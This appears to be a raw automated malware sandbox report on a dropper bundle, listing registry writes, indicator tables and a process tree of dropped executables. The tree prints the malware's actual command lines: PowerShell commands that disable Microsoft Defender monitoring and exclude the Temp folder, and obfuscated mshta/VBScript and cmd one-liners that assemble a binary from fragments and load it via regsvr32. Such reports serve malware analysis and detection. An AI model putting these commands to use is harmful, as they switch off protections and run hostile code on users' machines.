Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeMon179f74c0ff3cf1f.exeMon178e7a516181.exe

pid	process
2132	powershell.exe
2132	powershell.exe
2236	powershell.exe
2236	powershell.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
2284	Mon179f74c0ff3cf1f.exe
2284	Mon179f74c0ff3cf1f.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe
3508	Mon178e7a516181.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Explorer.EXEfoldershare.exe

pid process

3232 Explorer.EXE
6600 foldershare.exe

pid	process
3232	Explorer.EXE
6600	foldershare.exe

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

cd7hFkZpYeRMbWsNn4vCMlU3.exe2AdEKiwtmbqyhsj6CH0d8OOg.exechkdsk.exe

pid	process
5532	cd7hFkZpYeRMbWsNn4vCMlU3.exe
5636	2AdEKiwtmbqyhsj6CH0d8OOg.exe
5636	2AdEKiwtmbqyhsj6CH0d8OOg.exe
5636	2AdEKiwtmbqyhsj6CH0d8OOg.exe
5532	cd7hFkZpYeRMbWsNn4vCMlU3.exe
5532	cd7hFkZpYeRMbWsNn4vCMlU3.exe
6016	chkdsk.exe
6016	chkdsk.exe
6016	chkdsk.exe
6016	chkdsk.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exe

pid	process
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe
11812	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

4139395.exe

pid process

3900 4139395.exe

pid	process
3900	4139395.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Mon17870faab0.exeMon178d8e5d06822.exepowershell.exepowershell.exeMon17332e41e6b.exetaskkill.exe3USwTq_PDXPFVovcXAHaxe8_.exe

description	pid	process
Token: SeCreateTokenPrivilege	3992	Mon17870faab0.exe
Token: SeAssignPrimaryTokenPrivilege	3992	Mon17870faab0.exe
Token: SeLockMemoryPrivilege	3992	Mon17870faab0.exe
Token: SeIncreaseQuotaPrivilege	3992	Mon17870faab0.exe
Token: SeMachineAccountPrivilege	3992	Mon17870faab0.exe
Token: SeTcbPrivilege	3992	Mon17870faab0.exe
Token: SeSecurityPrivilege	3992	Mon17870faab0.exe
Token: SeTakeOwnershipPrivilege	3992	Mon17870faab0.exe
Token: SeLoadDriverPrivilege	3992	Mon17870faab0.exe
Token: SeSystemProfilePrivilege	3992	Mon17870faab0.exe
Token: SeSystemtimePrivilege	3992	Mon17870faab0.exe
Token: SeProfSingleProcessPrivilege	3992	Mon17870faab0.exe
Token: SeIncBasePriorityPrivilege	3992	Mon17870faab0.exe
Token: SeCreatePagefilePrivilege	3992	Mon17870faab0.exe
Token: SeCreatePermanentPrivilege	3992	Mon17870faab0.exe
Token: SeBackupPrivilege	3992	Mon17870faab0.exe
Token: SeRestorePrivilege	3992	Mon17870faab0.exe
Token: SeShutdownPrivilege	3992	Mon17870faab0.exe
Token: SeDebugPrivilege	3992	Mon17870faab0.exe
Token: SeAuditPrivilege	3992	Mon17870faab0.exe
Token: SeSystemEnvironmentPrivilege	3992	Mon17870faab0.exe
Token: SeChangeNotifyPrivilege	3992	Mon17870faab0.exe
Token: SeRemoteShutdownPrivilege	3992	Mon17870faab0.exe
Token: SeUndockPrivilege	3992	Mon17870faab0.exe
Token: SeSyncAgentPrivilege	3992	Mon17870faab0.exe
Token: SeEnableDelegationPrivilege	3992	Mon17870faab0.exe
Token: SeManageVolumePrivilege	3992	Mon17870faab0.exe
Token: SeImpersonatePrivilege	3992	Mon17870faab0.exe
Token: SeCreateGlobalPrivilege	3992	Mon17870faab0.exe
Token: 31	3992	Mon17870faab0.exe
Token: 32	3992	Mon17870faab0.exe
Token: 33	3992	Mon17870faab0.exe
Token: 34	3992	Mon17870faab0.exe
Token: 35	3992	Mon17870faab0.exe
Token: SeDebugPrivilege	780	Mon178d8e5d06822.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	3372	Mon17332e41e6b.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeCreateTokenPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeAssignPrimaryTokenPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeLockMemoryPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeIncreaseQuotaPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeMachineAccountPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeTcbPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeSecurityPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeTakeOwnershipPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeLoadDriverPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeSystemProfilePrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeSystemtimePrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeProfSingleProcessPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeIncBasePriorityPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeCreatePagefilePrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeCreatePermanentPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeBackupPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeRestorePrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeShutdownPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeDebugPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeAuditPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeSystemEnvironmentPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeChangeNotifyPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeRemoteShutdownPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeUndockPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe
Token: SeSyncAgentPrivilege	5844	3USwTq_PDXPFVovcXAHaxe8_.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

installer.exeCalculator.exemsedge.exeinstaller.exe

pid process

40888 installer.exe
6304 Calculator.exe
11812 msedge.exe
28856 installer.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

cmd.execmd.exe

pid process

40760 cmd.exe
28880 cmd.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3232 Explorer.EXE

pid	process
40888	installer.exe
6304	Calculator.exe
11812	msedge.exe
28856	installer.exe

pid	process
40760	cmd.exe
28880	cmd.exe

pid	process
3232	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 808 wrote to memory of 2352	808	setup_x86_x64_install.exe	setup_installer.exe
PID 808 wrote to memory of 2352	808	setup_x86_x64_install.exe	setup_installer.exe
PID 808 wrote to memory of 2352	808	setup_x86_x64_install.exe	setup_installer.exe
PID 2352 wrote to memory of 2584	2352	setup_installer.exe	setup_install.exe
PID 2352 wrote to memory of 2584	2352	setup_installer.exe	setup_install.exe
PID 2352 wrote to memory of 2584	2352	setup_installer.exe	setup_install.exe
PID 2584 wrote to memory of 484	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 484	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 484	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1540	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1540	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1540	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1844	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1844	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1844	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2252	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2252	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2252	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2216	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2216	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2216	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4756	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4756	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4756	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1720	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1720	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1720	2584	setup_install.exe	cmd.exe
PID 1540 wrote to memory of 2132	1540	cmd.exe	powershell.exe
PID 1540 wrote to memory of 2132	1540	cmd.exe	powershell.exe
PID 1540 wrote to memory of 2132	1540	cmd.exe	powershell.exe
PID 484 wrote to memory of 2236	484	cmd.exe	powershell.exe
PID 484 wrote to memory of 2236	484	cmd.exe	powershell.exe
PID 484 wrote to memory of 2236	484	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2264	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2264	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 2264	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4480	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4480	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4480	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3440	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3440	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3440	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4984	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4984	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4984	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3052	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3052	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3052	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 720	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 720	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 720	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3664	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3664	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 3664	2584	setup_install.exe	cmd.exe
PID 2252 wrote to memory of 3508	2252	cmd.exe	Mon178e7a516181.exe
PID 2252 wrote to memory of 3508	2252	cmd.exe	Mon178e7a516181.exe
PID 2252 wrote to memory of 3508	2252	cmd.exe	Mon178e7a516181.exe
PID 2584 wrote to memory of 4132	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4132	2584	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 4132	2584	setup_install.exe	cmd.exe
PID 1844 wrote to memory of 3992	1844	cmd.exe	Mon17870faab0.exe
PID 1844 wrote to memory of 3992	1844	cmd.exe	Mon17870faab0.exe
PID 1844 wrote to memory of 3992	1844	cmd.exe	Mon17870faab0.exe
PID 2584 wrote to memory of 4960	2584	setup_install.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3232

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2352

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS039332F3\setup_install.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17870faab0.exe
Mon17870faab0.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
5⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon175e6c8b40064b8c8.exe
Mon175e6c8b40064b8c8.exe
6⤵
- Executes dropped EXE
PID:796

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
7⤵
PID:2168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f
8⤵
PID:3192

C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
9⤵
- Executes dropped EXE
PID:2720

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
10⤵
PID:6472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
11⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
12⤵
PID:5808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
12⤵
PID:5804

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /S YLIH.bIN
12⤵
- Loads dropped DLL
PID:3324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
5⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17bffc2992eb3d.exe
Mon17bffc2992eb3d.exe /mixone
6⤵
- Executes dropped EXE
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 240
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon178e7a516181.exe
Mon178e7a516181.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3508

C:\Users\Admin\Pictures\Adobe Films\bqSOxpobZWXP5_0FiJA9wsr_.exe
"C:\Users\Admin\Pictures\Adobe Films\bqSOxpobZWXP5_0FiJA9wsr_.exe"
7⤵
- Executes dropped EXE
PID:5064

C:\Users\Admin\Pictures\Adobe Films\VGwOG1Ej7n9HJz5cBUbWLZMJ.exe
"C:\Users\Admin\Pictures\Adobe Films\VGwOG1Ej7n9HJz5cBUbWLZMJ.exe"
7⤵
- Executes dropped EXE
PID:5520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 276
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6676

C:\Users\Admin\Pictures\Adobe Films\ykl6gUZWo4dCf42Ongmp5gYO.exe
"C:\Users\Admin\Pictures\Adobe Films\ykl6gUZWo4dCf42Ongmp5gYO.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5488

C:\Users\Admin\Pictures\Adobe Films\ykl6gUZWo4dCf42Ongmp5gYO.exe
"C:\Users\Admin\Pictures\Adobe Films\ykl6gUZWo4dCf42Ongmp5gYO.exe"
8⤵
PID:2164

C:\Users\Admin\Pictures\Adobe Films\1WfbS9cAfVpg_CC6_TRn2VH0.exe
"C:\Users\Admin\Pictures\Adobe Films\1WfbS9cAfVpg_CC6_TRn2VH0.exe"
7⤵
- Executes dropped EXE
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 280
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1792

C:\Users\Admin\Pictures\Adobe Films\fcjklk9IilNVu9j1EhTx7S2Q.exe
"C:\Users\Admin\Pictures\Adobe Films\fcjklk9IilNVu9j1EhTx7S2Q.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5464

C:\Users\Admin\Pictures\Adobe Films\fcjklk9IilNVu9j1EhTx7S2Q.exe
"C:\Users\Admin\Pictures\Adobe Films\fcjklk9IilNVu9j1EhTx7S2Q.exe"
8⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 204
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2152

